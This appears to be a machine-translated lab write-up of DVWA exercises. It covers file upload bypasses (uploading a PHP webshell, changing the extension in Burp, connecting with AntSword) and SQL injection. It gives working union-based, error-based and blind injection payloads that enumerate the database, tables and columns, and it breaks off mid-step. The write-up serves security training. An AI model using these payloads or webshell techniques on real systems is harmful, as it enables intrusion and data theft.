file upload（ Upload files ）

low

File upload vulnerability , Usually due to the type of upload file , The content is not strictly filtered , Check , So that the attacker can get the server's webshell jurisdiction , Therefore, the harm caused by file upload vulnerability is often devastating ,Apache,Tomcat,Nginx And so on are exposed file upload vulnerabilities .

Check the source code and find that there are no restrictions on the content of file types. Check for file upload vulnerabilities .

Make a word Trojan , The file format is php Upload files . Connect with an ant sword . Backstage .

 Mdeium

Check the source code and find that the file type limit should be jepg Or for png

  Edit a sentence: the Trojan horse is jpg Format upload , Use burp Capture the package and change the file format to php Format , After success, use ant sword to connect

SQL injection（sql Inject ）

low

1、 Determine the type of Injection

Input 1 success , Input 1 and1=1 success Input 1’ Failure

It is judged as digital injection

 2、 guess sql The number of fields in the query statement

Input 1’ order by 2# success Input 1’ order by 3# Failure , Determine that the number of fields is 2

 3、 Get users , database , Version number

Input 1' union select 1,concat(user(),database(),version())#

4, Gets the tables in the database

1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

medium

1. After submission burp Grab the bag , modify id=1 Change it to 1 and 1=2 union select 1,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x #

Check in the response package

Repeat the above steps

2. Number of blasting tables ： id=1 Change it to 1 and 1=2 union select 1,concat((select count(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#

3. Name of blasting table ： id=1 Change it to  1 and 1=2 union select 1,concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#

 4. Blast users Field name

id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 ),floor(rand(0)*2))x from information_schema.tables group by x#
 

 SQL injection（sql Injection blind injection ）

Determine the injection type and sql Inject the same

Judge the length of the database

Input 1’ and length(database())=1 #, Show that there is no ;

Input 1’ and length(database())=2 #, Show that there is no ;

Input 1’ and length(database())=3 #, Show that there is no ;

Input 1’ and length(database())=4 #, Show the presence of ：